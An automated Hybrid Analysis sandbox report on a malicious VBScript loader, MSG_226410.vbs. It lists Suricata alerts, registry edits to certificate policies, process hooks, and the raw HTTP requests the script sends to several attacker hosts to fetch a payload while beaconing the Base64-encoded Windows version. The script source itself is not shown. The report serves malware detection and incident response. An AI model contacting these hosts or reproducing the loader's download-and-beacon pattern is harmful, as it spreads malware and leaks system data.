MSG_226410.vbs
This report is generated from a file or URL submitted to this webservice on March 27th 2020 10:04:41 (UTC)
Guest System: Windows 7 32 bit, Professional, 6.1 (build 7601), Service Pack 1
Report generated by Falcon Sandbox v8.30 © Hybrid Analysis
Incident Response
Risk Assessment
- Network Behavior
- Contacts 5 domains and 5 hosts.
MITRE ATT&CK™ Techniques Detection
Indicators
-
Malicious Indicators 4
-
External Systems
-
Detected Suricata Alert
- details
- Detected alert "ETPRO MALWARE Unk.VBSLoader Retrieving Payload" (SID: 2841137, Rev: 1, Severity: 1) categorized as "A Network Trojan was detected" (PUA/PUP/Adware)
- source
- Suricata Alerts
- relevance
- 10/10
-
Sample was identified as malicious by at least one Antivirus engine
- details
- 3/60 Antivirus vendors marked sample as malicious (5% detection rate)
- source
- External System
- relevance
- 8/10
-
Network Related
-
Malicious artifacts seen in the context of a contacted host
- details
-
Found malicious artifacts related to "37.9.175.9": ...
URL: http://gdpronline.sk/staple/444444.png (AV positives: 3/76 scanned on 03/27/2020 01:25:13)
URL: http://gdpronline.sk/staple/444444.png?uid=TQBpAGMAcgBvAHMAbwBmAHQAIABXAGkAbgBkAG8AdwBzACAANwAgAFAAcgBvAGYAZQBzAHMAaQBvAG4AYQBsACAA (AV positives: 5/76 scanned on 03/26/2020 18:53:38)
URL: https://app.jtrbot.com/ (AV positives: 1/76 scanned on 03/26/2020 14:52:45)
URL: http://topfest.sk/misc/farbtastic/css/login/customer_center/customer-IDPP00C149/myaccount/signin (AV positives: 5/76 scanned on 03/26/2020 07:10:23)
URL: http://zeleneatrium.sk/media-o-nas/v-trnave-rastie-slovensky-unikat/engine1/style.css (AV positives: 1/76 scanned on 03/25/2020 15:16:10)
- source
- Network Traffic
- relevance
- 10/10
-
Hiding 1 Malicious Indicators
-
Suspicious Indicators 5
-
Anti-Reverse Engineering
-
Possibly checks for known debuggers/analysis tools
- details
- Matched obfuscated script text (Indicator: "ntice")
- source
- File/Memory
- relevance
- 2/10
-
External Systems
-
Found an IP/URL artifact that was identified as malicious by at least one reputation engine
- details
-
3/76 reputation engines marked "http://www.kitaair.com" as malicious (3% detection rate)
2/76 reputation engines marked "http://gdpronline.sk" as malicious (2% detection rate)
3/76 reputation engines marked "http://kitaair.com" as malicious (3% detection rate)
2/76 reputation engines marked "http://hotdsk.com" as malicious (2% detection rate) - source
- External System
- relevance
- 10/10
-
Installation/Persistence
-
Executes a visual basic script
- details
- Process "wscript.exe" with commandline ""C:\MSG_226410.vbs""
- source
- Monitored Target
- relevance
- 10/10
-
Loads the task scheduler COM API
- details
-
"wscript.exe" loaded module "%WINDIR%\System32\taskschd.dll" at 73C00000
"wscript.exe" loaded module "%WINDIR%\System32\taskschd.dll" at 023E0000 - source
- Loaded Module
- relevance
- 5/10
- ATT&CK ID
- T1168
-
Network Related
-
Sends traffic on typical HTTP outbound port, but without HTTP header
- details
-
TCP traffic to 173.249.60.219 on port 80 is sent without HTTP header
TCP traffic to 46.16.91.179 on port 80 is sent without HTTP header
TCP traffic to 46.16.91.179 on port 443 is sent without HTTP header
TCP traffic to 37.9.175.9 on port 80 is sent without HTTP header
TCP traffic to 77.104.140.85 on port 80 is sent without HTTP header - source
- Network Traffic
- relevance
- 5/10
-
Informative 14
-
General
-
Accesses Software Policy Settings
- details
-
"wscript.exe" (Path: "HKCU\SOFTWARE\POLICIES\MICROSOFT\SYSTEMCERTIFICATES\CA"; Key: "")
"wscript.exe" (Path: "HKCU\SOFTWARE\POLICIES\MICROSOFT\SYSTEMCERTIFICATES\CA\CERTIFICATES"; Key: "")
"wscript.exe" (Path: "HKCU\SOFTWARE\POLICIES\MICROSOFT\SYSTEMCERTIFICATES\CA\CRLS"; Key: "")
"wscript.exe" (Path: "HKCU\SOFTWARE\POLICIES\MICROSOFT\SYSTEMCERTIFICATES\CA\CTLS"; Key: "")
"wscript.exe" (Path: "HKLM\SOFTWARE\POLICIES\MICROSOFT\SYSTEMCERTIFICATES\CA"; Key: "")
"wscript.exe" (Path: "HKLM\SOFTWARE\POLICIES\MICROSOFT\SYSTEMCERTIFICATES\CA\CERTIFICATES"; Key: "")
"wscript.exe" (Path: "HKLM\SOFTWARE\POLICIES\MICROSOFT\SYSTEMCERTIFICATES\CA\CRLS"; Key: "")
"wscript.exe" (Path: "HKLM\SOFTWARE\POLICIES\MICROSOFT\SYSTEMCERTIFICATES\CA\CTLS"; Key: "")
"wscript.exe" (Path: "HKCU\SOFTWARE\POLICIES\MICROSOFT\SYSTEMCERTIFICATES\DISALLOWED"; Key: "")
"wscript.exe" (Path: "HKCU\SOFTWARE\POLICIES\MICROSOFT\SYSTEMCERTIFICATES\DISALLOWED\CERTIFICATES"; Key: "")
"wscript.exe" (Path: "HKCU\SOFTWARE\POLICIES\MICROSOFT\SYSTEMCERTIFICATES\DISALLOWED\CRLS"; Key: "")
"wscript.exe" (Path: "HKCU\SOFTWARE\POLICIES\MICROSOFT\SYSTEMCERTIFICATES\DISALLOWED\CTLS"; Key: "")
"wscript.exe" (Path: "HKLM\SOFTWARE\POLICIES\MICROSOFT\SYSTEMCERTIFICATES\DISALLOWED"; Key: "")
"wscript.exe" (Path: "HKLM\SOFTWARE\POLICIES\MICROSOFT\SYSTEMCERTIFICATES\DISALLOWED\CERTIFICATES"; Key: "")
"wscript.exe" (Path: "HKLM\SOFTWARE\POLICIES\MICROSOFT\SYSTEMCERTIFICATES\DISALLOWED\CRLS"; Key: "")
"wscript.exe" (Path: "HKLM\SOFTWARE\POLICIES\MICROSOFT\SYSTEMCERTIFICATES\DISALLOWED\CTLS"; Key: "")
"wscript.exe" (Path: "HKLM\SOFTWARE\POLICIES\MICROSOFT\SYSTEMCERTIFICATES\ROOT"; Key: "")
"wscript.exe" (Path: "HKLM\SOFTWARE\POLICIES\MICROSOFT\SYSTEMCERTIFICATES\ROOT\CERTIFICATES"; Key: "")
"wscript.exe" (Path: "HKLM\SOFTWARE\POLICIES\MICROSOFT\SYSTEMCERTIFICATES\ROOT\CRLS"; Key: "")
"wscript.exe" (Path: "HKLM\SOFTWARE\POLICIES\MICROSOFT\SYSTEMCERTIFICATES\ROOT\CTLS"; Key: "") - source
- Registry Access
- relevance
- 10/10
- ATT&CK ID
- T1012
-
Accesses System Certificates Settings
- details
-
"wscript.exe" (Path: "HKCU\SOFTWARE\MICROSOFT\SYSTEMCERTIFICATES\MY"; Key: "")
"wscript.exe" (Path: "HKCU\SOFTWARE\MICROSOFT\SYSTEMCERTIFICATES\CA"; Key: "")
"wscript.exe" (Path: "HKCU\SOFTWARE\MICROSOFT\SYSTEMCERTIFICATES\CA\CERTIFICATES"; Key: "")
"wscript.exe" (Path: "HKCU\SOFTWARE\MICROSOFT\SYSTEMCERTIFICATES\CA\CRLS"; Key: "")
"wscript.exe" (Path: "HKCU\SOFTWARE\MICROSOFT\SYSTEMCERTIFICATES\CA\CTLS"; Key: "")
"wscript.exe" (Path: "HKLM\SOFTWARE\MICROSOFT\SYSTEMCERTIFICATES\CA"; Key: "")
"wscript.exe" (Path: "HKLM\SOFTWARE\MICROSOFT\SYSTEMCERTIFICATES\CA\CERTIFICATES"; Key: "")
"wscript.exe" (Path: "HKLM\SOFTWARE\MICROSOFT\SYSTEMCERTIFICATES\CA\CRLS"; Key: "")
"wscript.exe" (Path: "HKLM\SOFTWARE\MICROSOFT\SYSTEMCERTIFICATES\CA\CTLS"; Key: "")
"wscript.exe" (Path: "HKCU\SOFTWARE\MICROSOFT\SYSTEMCERTIFICATES\DISALLOWED"; Key: "")
"wscript.exe" (Path: "HKCU\SOFTWARE\MICROSOFT\SYSTEMCERTIFICATES\DISALLOWED\CERTIFICATES"; Key: "")
"wscript.exe" (Path: "HKCU\SOFTWARE\MICROSOFT\SYSTEMCERTIFICATES\DISALLOWED\CRLS"; Key: "")
"wscript.exe" (Path: "HKCU\SOFTWARE\MICROSOFT\SYSTEMCERTIFICATES\DISALLOWED\CTLS"; Key: "")
"wscript.exe" (Path: "HKLM\SOFTWARE\MICROSOFT\SYSTEMCERTIFICATES\DISALLOWED"; Key: "")
"wscript.exe" (Path: "HKLM\SOFTWARE\MICROSOFT\SYSTEMCERTIFICATES\DISALLOWED\CERTIFICATES"; Key: "")
"wscript.exe" (Path: "HKLM\SOFTWARE\MICROSOFT\SYSTEMCERTIFICATES\DISALLOWED\CRLS"; Key: "") - source
- Registry Access
- relevance
- 10/10
- ATT&CK ID
- T1112
-
Contacts domains
- details
-
"hotdsk.com"
"kitaair.com"
"gdpronline.sk"
"a.8xcornwall.com"
"www.kitaair.com" - source
- Network Traffic
- relevance
- 1/10
-
Contacts server
- details
-
"173.249.60.219:80"
"46.16.91.179:80"
"46.16.91.179:443"
"37.9.175.9:80"
"77.104.140.85:80" - source
- Network Traffic
- relevance
- 1/10
-
Loads the .NET runtime environment
- details
- "wscript.exe" loaded module "%WINDIR%\assembly\NativeImages_v2.0.50727_32\mscorlib\9f895c66454577eff9c77442d0c84f71\mscorlib.ni.dll" at 652E0000
- source
- Loaded Module
-
Logged script engine calls
- details
-
"wscript.exe" called "Msxml2.DOMDocument.3.0.CreateObject" ...
"wscript.exe" called "ADODB.Stream.6.0.CreateObject" ...
"wscript.exe" called "WScript.Shell.1.CreateObject" ... - source
- API Call
- relevance
- 10/10
-
Overview of unique CLSIDs touched in registry
- details
-
"wscript.exe" touched "VB Script Language" (Path: "HKCU\CLSID\{B54F3741-5B07-11CF-A4B0-00AA004A55E8}")
"wscript.exe" touched "Constructor that allows hosts better control creating scriptlets" (Path: "HKCU\CLSID\{06290BD1-48AA-11D2-8432-006008C3FBFC}")
"wscript.exe" touched "XML DOM Document 3.0" (Path: "HKCR\SOFTWARE\CLASSES\CLSID\{F5078F32-C551-11D3-89B9-0000F81FE221}")
"wscript.exe" touched "ADODB.Stream" (Path: "HKCU\CLSID\{00000566-0000-0010-8000-00AA006D2EA4}\TREATAS")
"wscript.exe" touched "Multi Language Support" (Path: "HKCU\CLSID\{275C23E2-3747-11D0-9FEA-00AA003F8646}\TREATAS")
"wscript.exe" touched "Windows Script Host Shell Object" (Path: "HKCU\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}\TREATAS")
"wscript.exe" touched "Server XML HTTP 6.0" (Path: "HKCU\CLSID\{88D96A0B-F192-11D4-A65F-0040963251E5}\TREATAS")
"wscript.exe" touched "WinHttpRequest Component version 5.1" (Path: "HKCU\CLSID\{2087C2F4-2CEF-4953-A8AB-66779B670495}\TREATAS")
"wscript.exe" touched "Wbem Scripting Object Path" (Path: "HKCU\CLSID\{172BDDF8-CEEA-11D1-8B05-00600806D9B6}\TREATAS")
"wscript.exe" touched "WBEM Locator" (Path: "HKCU\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\TREATAS")
"wscript.exe" touched "WbemDefaultPathParser" (Path: "HKCU\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\TREATAS")
"wscript.exe" touched "Windows Management and Instrumentation" (Path: "HKCU\CLSID\{8BC3F05E-D86B-11D0-A075-00C04FB68820}\TREATAS")
"wscript.exe" touched "PSFactoryBuffer" (Path: "HKCU\CLSID\{7C857801-7381-11CF-884D-00AA004B2E24}\TREATAS")
"wscript.exe" touched "Microsoft WBEM (non)Standard Marshaling for IWbemServices" (Path: "HKCU\CLSID\{D68AF00A-29CB-43FA-8504-CE99A996D9EA}\TREATAS")
"wscript.exe" touched "Microsoft WBEM (non)Standard Marshaling for IEnumWbemClassObject" (Path: "HKCU\CLSID\{1B1CAD8C-2DAB-11D2-B604-00104B703EFD}\TREATAS")
"wscript.exe" touched "System.Text.UnicodeEncoding" (Path: "HKCU\CLSID\{A0F5F5DC-337B-38D7-B1A3-FB1B95666BBF}\TREATAS")
"wscript.exe" touched "XML DOM Document" (Path: "HKCU\CLSID\{2933BF90-7B36-11D2-B20E-00C04F983E60}\TREATAS")
"wscript.exe" touched "Microsoft OLE DB Error Collection Service" (Path: "HKCU\CLSID\{C8B522CF-5CF3-11CE-ADE5-00AA0044773D}\TREATAS")
"wscript.exe" touched "ADO 6.0" (Path: "HKCU\CLSID\{0000051A-0000-0010-8000-00AA006D2EA4}\EXTENDEDERRORS")
"wscript.exe" touched "ADODB Error Lookup Service" (Path: "HKCU\CLSID\{00000542-0000-0010-8000-00AA006D2EA4}\TREATAS") - source
- Registry Access
- relevance
- 3/10
-
Installation/Persistence
-
Touches files in the Windows directory
- details
-
"wscript.exe" touched file "%WINDIR%\System32\wscript.exe"
"wscript.exe" touched file "C:\Windows\Globalization\Sorting\SortDefault.nls"
"wscript.exe" touched file "C:\Windows\System32\en-US\KernelBase.dll.mui"
"wscript.exe" touched file "C:\Windows\System32\msxml3r.dll"
"wscript.exe" touched file "C:\Windows\System32\wshom.ocx"
"wscript.exe" touched file "C:\Windows\System32\msxml6r.dll"
"wscript.exe" touched file "C:\Windows\System32\wbem\wbemdisp.tlb"
"wscript.exe" touched file "C:\Windows\Microsoft.NET\Framework\v1.0.3705\clr.dll"
"wscript.exe" touched file "C:\Windows\Microsoft.NET\Framework\v1.0.3705\mscorwks.dll"
"wscript.exe" touched file "C:\Windows\Microsoft.NET\Framework\v1.1.4322\clr.dll"
"wscript.exe" touched file "C:\Windows\Microsoft.NET\Framework\v1.1.4322\mscorwks.dll"
"wscript.exe" touched file "C:\Windows\Microsoft.NET\Framework\v2.0.50727\clr.dll"
"wscript.exe" touched file "C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorwks.dll"
"wscript.exe" touched file "C:\Windows\Microsoft.NET\Framework\v4.0.30319\clr.dll"
"wscript.exe" touched file "C:\Windows\System32\WScript.exe.config"
"wscript.exe" touched file "C:\Windows\assembly\NativeImages_v2.0.50727_32\index34e.dat" - source
- API Call
- relevance
- 7/10
-
Network Related
-
Found potential URL in binary/memory
- details
-
Heuristic match: "hotdsk.com"
Heuristic match: "GET /staple/444444.png?uid=TQBpAGMAcgBvAHMAbwBmAHQAIABXAGkAbgBkAG8AdwBzACAANwAgAFAAcgBvAGYAZQBzAHMAaQBvAG4AYQBsACAA HTTP/1.1
Connection: Keep-Alive
Accept: */*
Accept-Language: en-us
User-Agent: Prada
Host: hotdsk.com"
Heuristic match: "kitaair.com"
Heuristic match: "GET /staple/444444.png?uid=TQBpAGMAcgBvAHMAbwBmAHQAIABXAGkAbgBkAG8AdwBzACAANwAgAFAAcgBvAGYAZQBzAHMAaQBvAG4AYQBsACAA HTTP/1.1
Connection: Keep-Alive
Accept: */*
Accept-Language: en-us
User-Agent: Prada
Host: kitaair.com"
Heuristic match: "gdpronline.sk"
Heuristic match: "GET /staple/444444.png?uid=TQBpAGMAcgBvAHMAbwBmAHQAIABXAGkAbgBkAG8AdwBzACAANwAgAFAAcgBvAGYAZQBzAHMAaQBvAG4AYQBsACAA HTTP/1.1
Connection: Keep-Alive
Accept: */*
Accept-Language: en-us
User-Agent: Prada
Host: gdpronline.sk"
Heuristic match: "a.8xcornwall.com"
Heuristic match: "GET /12891239.png?uid=TQBpAGMAcgBvAHMAbwBmAHQAIABXAGkAbgBkAG8AdwBzACAANwAgAFAAcgBvAGYAZQBzAHMAaQBvAG4AYQBsACAA HTTP/1.1
Connection: Keep-Alive
Accept: */*
Accept-Language: en-us
User-Agent: Prada
Host: a.8xcornwall.com"
Pattern match: "www.kitaair.com" - source
- File/Memory
- relevance
- 10/10
-
HTTP request contains Base64 encoded artifacts
- details
- "Microsoft Windows 7 Professional "
- source
- Network Traffic
- relevance
- 7/10
- ATT&CK ID
- T1132
-
Spyware/Information Retrieval
-
Found a reference to a known community page
- details
- Matched obfuscated script text (Indicator: "twitter")
- source
- File/Memory
- relevance
- 7/10
-
System Security
-
Creates or modifies windows services
- details
- "wscript.exe" (Access type: "CREATE"; Path: "HKLM\SYSTEM\CURRENTCONTROLSET\SERVICES\TCPIP\PARAMETERS")
- source
- Registry Access
- relevance
- 10/10
- ATT&CK ID
- T1112
-
Modifies Software Policy Settings
- details
-
"wscript.exe" (Access type: "CREATE"; Path: "HKCU\SOFTWARE\POLICIES\MICROSOFT\SYSTEMCERTIFICATES\CA")
"wscript.exe" (Access type: "CREATE"; Path: "HKCU\SOFTWARE\POLICIES\MICROSOFT\SYSTEMCERTIFICATES\CA\CERTIFICATES")
"wscript.exe" (Access type: "CREATE"; Path: "HKCU\SOFTWARE\POLICIES\MICROSOFT\SYSTEMCERTIFICATES\CA\CRLS")
"wscript.exe" (Access type: "CREATE"; Path: "HKCU\SOFTWARE\POLICIES\MICROSOFT\SYSTEMCERTIFICATES\CA\CTLS")
"wscript.exe" (Access type: "CREATE"; Path: "HKLM\SOFTWARE\POLICIES\MICROSOFT\SYSTEMCERTIFICATES\CA")
"wscript.exe" (Access type: "CREATE"; Path: "HKLM\SOFTWARE\POLICIES\MICROSOFT\SYSTEMCERTIFICATES\CA\CERTIFICATES")
"wscript.exe" (Access type: "CREATE"; Path: "HKLM\SOFTWARE\POLICIES\MICROSOFT\SYSTEMCERTIFICATES\CA\CRLS")
"wscript.exe" (Access type: "CREATE"; Path: "HKLM\SOFTWARE\POLICIES\MICROSOFT\SYSTEMCERTIFICATES\CA\CTLS")
"wscript.exe" (Access type: "CREATE"; Path: "HKCU\SOFTWARE\POLICIES\MICROSOFT\SYSTEMCERTIFICATES\DISALLOWED")
"wscript.exe" (Access type: "CREATE"; Path: "HKCU\SOFTWARE\POLICIES\MICROSOFT\SYSTEMCERTIFICATES\DISALLOWED\CERTIFICATES")
"wscript.exe" (Access type: "CREATE"; Path: "HKCU\SOFTWARE\POLICIES\MICROSOFT\SYSTEMCERTIFICATES\DISALLOWED\CRLS")
"wscript.exe" (Access type: "CREATE"; Path: "HKCU\SOFTWARE\POLICIES\MICROSOFT\SYSTEMCERTIFICATES\DISALLOWED\CTLS")
"wscript.exe" (Access type: "CREATE"; Path: "HKLM\SOFTWARE\POLICIES\MICROSOFT\SYSTEMCERTIFICATES\DISALLOWED")
"wscript.exe" (Access type: "CREATE"; Path: "HKLM\SOFTWARE\POLICIES\MICROSOFT\SYSTEMCERTIFICATES\DISALLOWED\CERTIFICATES")
"wscript.exe" (Access type: "CREATE"; Path: "HKLM\SOFTWARE\POLICIES\MICROSOFT\SYSTEMCERTIFICATES\DISALLOWED\CRLS")
"wscript.exe" (Access type: "CREATE"; Path: "HKLM\SOFTWARE\POLICIES\MICROSOFT\SYSTEMCERTIFICATES\DISALLOWED\CTLS")
"wscript.exe" (Access type: "CREATE"; Path: "HKLM\SOFTWARE\POLICIES\MICROSOFT\SYSTEMCERTIFICATES\ROOT")
"wscript.exe" (Access type: "CREATE"; Path: "HKLM\SOFTWARE\POLICIES\MICROSOFT\SYSTEMCERTIFICATES\ROOT\CERTIFICATES")
"wscript.exe" (Access type: "CREATE"; Path: "HKLM\SOFTWARE\POLICIES\MICROSOFT\SYSTEMCERTIFICATES\ROOT\CRLS")
"wscript.exe" (Access type: "CREATE"; Path: "HKLM\SOFTWARE\POLICIES\MICROSOFT\SYSTEMCERTIFICATES\ROOT\CTLS") - source
- Registry Access
- relevance
- 10/10
- ATT&CK ID
- T1112
-
Unusual Characteristics
-
Installs hooks/patches the running process
- details
-
"wscript.exe" wrote bytes "db0b57a2" to virtual address "0x6E1B1FFC" (part of module "MSCORWKS.DLL")
"wscript.exe" wrote bytes "fae67477e1a679772e717977ee29797785e274776da0797726e47477d16d7977003d7777804b777700000000ad379a758b2d9a75b6419a7500000000" to virtual address "0x74AD1000" (part of module "WSHTCPIP.DLL")
"wscript.exe" wrote bytes "e7397577e1a679772e717977ee29797785e274776da07977906478773ad57f7726e47477d16d7977003d7777804b777700000000ad379a758b2d9a75b6419a7500000000" to virtual address "0x75001000" (part of module "WSHIP6.DLL")
"wscript.exe" wrote bytes "c04e777720547877e0657877b53879770000000000d0a27500000000c5eaa2750000000088eaa27500000000e968937582287977ee29797700000000d2699375000000007dbba2750000000009be937500000000ba18a27500000000" to virtual address "0x77981000" (part of module "NSI.DLL")
- source
- Hook Detection
- relevance
- 10/10
- ATT&CK ID
- T1179 (Show technique in the MITRE ATT&CK™ matrix)
-
Installs hooks/patches the running process
File Details
MSG_226410.vbs
- Filename
- MSG_226410.vbs
- Size
- 904KiB (925619 bytes)
- Type
- script vbs
- Description
- ASCII text, with very long lines
- Architecture
- WINDOWS
- SHA256
- ed59aa642193cbf79248843836acc502ca8c50a47d6a727946aa99bff33539ba
- MD5
- 5878d0a837ae43feae38524bad4ca555
- SHA1
- a6205723d61d27e0ffc6c580c4c798727363dc2e
- ssdeep
- 12288:8oVbWboFmRPe3c16B+lHTZXjKNN6M5dvMundhjScRMHprp:R1WM66IlHN0N6M5hMo+cRMH/
Screenshots
Hybrid Analysis
Analysed 1 process in total.
- wscript.exe "C:\MSG_226410.vbs" (PID: 1612)
Network Analysis
DNS Requests
| Domain | Address | Registrar | Country |
|---|---|---|---|
| a.8xcornwall.com | 77.104.140.85 (TTL: 13422) | - | Bulgaria |
| gdpronline.sk | 37.9.175.9 (TTL: 599) | - | Slovakia (SLOVAK Republic) |
| hotdsk.com | 173.249.60.219 (TTL: 14399) | Innovadeus Pvt. Ltd. | Germany |
| kitaair.com | 46.16.91.179 (TTL: 21599) | - | Italy |
| www.kitaair.com | 46.16.91.179 (TTL: 21599) | - | Italy |
Contacted Hosts
| IP Address | Port/Protocol | Associated Process | Details |
|---|---|---|---|
| 173.249.60.219 | 80 TCP | wscript.exe PID: 1612 | Germany |
| 46.16.91.179 | 80 TCP | wscript.exe PID: 1612 | Italy |
| 46.16.91.179 | 443 TCP | wscript.exe PID: 1612 | Italy |
| 37.9.175.9 | 80 TCP | wscript.exe PID: 1612 | Slovakia (SLOVAK Republic) |
| 77.104.140.85 | 80 TCP | wscript.exe PID: 1612 | Bulgaria |
Contacted Countries
HTTP Traffic
| Endpoint | Request | URL | Raw request |
|---|---|---|---|
| 173.249.60.219:80 (hotdsk.com) | GET | hotdsk.com/staple/444444.png?uid=TQBpAGMAcgBvAHMAbwBmAHQAIABXAGkAbgBkAG8AdwBzACAANwAgAFAAcgBvAGYAZQBzAHMAaQBvAG4AYQBsACAA | GET /staple/444444.png?uid=TQBpAGMAcgBvAHMAbwBmAHQAIABXAGkAbgBkAG8AdwBzACAANwAgAFAAcgBvAGYAZQBzAHMAaQBvAG4AYQBsACAA HTTP/1.1<br>Connection: Keep-Alive<br>Accept: */*<br>Accept-Language: en-us<br>User-Agent: Prada<br>Host: hotdsk.com |
| 46.16.91.179:80 (kitaair.com) | GET | kitaair.com/staple/444444.png?uid=TQBpAGMAcgBvAHMAbwBmAHQAIABXAGkAbgBkAG8AdwBzACAANwAgAFAAcgBvAGYAZQBzAHMAaQBvAG4AYQBsACAA | GET /staple/444444.png?uid=TQBpAGMAcgBvAHMAbwBmAHQAIABXAGkAbgBkAG8AdwBzACAANwAgAFAAcgBvAGYAZQBzAHMAaQBvAG4AYQBsACAA HTTP/1.1<br>Connection: Keep-Alive<br>Accept: */*<br>Accept-Language: en-us<br>User-Agent: Prada<br>Host: kitaair.com |
| 37.9.175.9:80 (gdpronline.sk) | GET | gdpronline.sk/staple/444444.png?uid=TQBpAGMAcgBvAHMAbwBmAHQAIABXAGkAbgBkAG8AdwBzACAANwAgAFAAcgBvAGYAZQBzAHMAaQBvAG4AYQBsACAA | GET /staple/444444.png?uid=TQBpAGMAcgBvAHMAbwBmAHQAIABXAGkAbgBkAG8AdwBzACAANwAgAFAAcgBvAGYAZQBzAHMAaQBvAG4AYQBsACAA HTTP/1.1<br>Connection: Keep-Alive<br>Accept: */*<br>Accept-Language: en-us<br>User-Agent: Prada<br>Host: gdpronline.sk |
| 37.9.175.9:80 (gdpronline.sk) | GET | gdpronline.sk/staple/444444.png?uid=TQBpAGMAcgBvAHMAbwBmAHQAIABXAGkAbgBkAG8AdwBzACAANwAgAFAAcgBvAGYAZQBzAHMAaQBvAG4AYQBsACAA | GET /staple/444444.png?uid=TQBpAGMAcgBvAHMAbwBmAHQAIABXAGkAbgBkAG8AdwBzACAANwAgAFAAcgBvAGYAZQBzAHMAaQBvAG4AYQBsACAA HTTP/1.1<br>Connection: Keep-Alive<br>Accept: */*<br>Accept-Language: en-us<br>User-Agent: Prada<br>Host: gdpronline.sk |
| 77.104.140.85:80 (a.8xcornwall.com) | GET | a.8xcornwall.com/12891239.png?uid=TQBpAGMAcgBvAHMAbwBmAHQAIABXAGkAbgBkAG8AdwBzACAANwAgAFAAcgBvAGYAZQBzAHMAaQBvAG4AYQBsACAA | GET /12891239.png?uid=TQBpAGMAcgBvAHMAbwBmAHQAIABXAGkAbgBkAG8AdwBzACAANwAgAFAAcgBvAGYAZQBzAHMAaQBvAG4AYQBsACAA HTTP/1.1<br>Connection: Keep-Alive<br>Accept: */*<br>Accept-Language: en-us<br>User-Agent: Prada<br>Host: a.8xcornwall.com |
Suricata Alerts
Event | Category | Description | SID |
---|---|---|---|
local -> 37.9.175.9:80 (TCP) | A Network Trojan was detected | ETPRO MALWARE Unk.VBSLoader Retrieving Payload | 2841137 |
local -> 173.249.60.219:80 (TCP) | A Network Trojan was detected | ETPRO MALWARE Unk.VBSLoader Retrieving Payload | 2841137 |
local -> 46.16.91.179:80 (TCP) | A Network Trojan was detected | ETPRO MALWARE Unk.VBSLoader Retrieving Payload | 2841137 |
local -> 77.104.140.85:80 (TCP) | A Network Trojan was detected | ETPRO MALWARE Unk.VBSLoader Retrieving Payload | 2841137 |
Extracted Strings
Extracted Files
No significant files were extracted.
Notifications
-
Runtime
- Although all strings were processed, some are hidden from the report in order to reduce the overall size
- Enforcing malicious verdict, as a reliable source indicates high confidence
- Not all sources for indicator ID "api-55" are available in the report
- Not all sources for indicator ID "api-64" are available in the report
- Not all sources for indicator ID "registry-17" are available in the report
- Not all sources for indicator ID "registry-18" are available in the report
- Not all sources for indicator ID "registry-19" are available in the report
- Not all sources for indicator ID "registry-72" are available in the report